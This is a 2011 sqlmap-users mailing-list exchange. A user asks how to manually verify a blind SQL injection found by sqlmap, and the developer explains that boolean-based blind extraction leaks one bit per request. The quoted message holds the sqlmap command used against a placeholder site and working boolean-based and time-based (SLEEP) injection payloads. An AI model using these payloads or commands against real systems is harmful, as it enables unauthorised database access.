Re: [sqlmap-users] manually verifying the vuln that sqlmap found
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] manually verifying the vuln that sqlmap found
|
From: Miroslav S. <mir...@gm...> - 2011-09-06 05:58:53
|
hi Max. -t debug.log will save the inbound/outbound HTTP traffic between the target and sqlmap. as you are dealing with boolean based injection there for sure won't be any "readable" data inside as every request represents only one bit of information you are looking for (current-db) Kind regards On Tue, Sep 6, 2011 at 7:49 AM, Max Pain <pai...@ya...> wrote: > Hello, > I'm trying to manually reproduce a blind sql injection that sqlmap ( 0.9 ) > found. > here is how I ran it. > ./sqlmap.py -v 6 --level 5 -u "http://site?id=9" --current-db -t debug.log > debug.log does not show any sign of a current-db ( that is in > output/site/log ) > What am I missing? > sqlmap identified the following injection points with a total of 403 HTTP(s) > requests: > > --- > > > log shows: > Place: GET > > > Parameter: fid > > > Type: boolean-based blind > > > Title: AND boolean-based blind - WHERE or HAVING clause > > > Payload: id=9' AND 8437=8437 AND 'oCOc'='oCOc > > > > > > Type: AND/OR time-based blind > > > Title: MySQL > 5.0.11 AND time-based blind > > > Payload: id=9' AND SLEEP(5) AND 'BKLq'='BKLq > --- > current database: 'dbname' > ------------------------------------------------------------------------------ > Special Offer -- Download ArcSight Logger for FREE! > Finally, a world-class log management solution at an even better > price-free! And you'll get a free "Love Thy Logs" t-shirt when you > download Logger. Secure your free ArcSight Logger TODAY! > http://p.sf.net/sfu/arcsisghtdev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
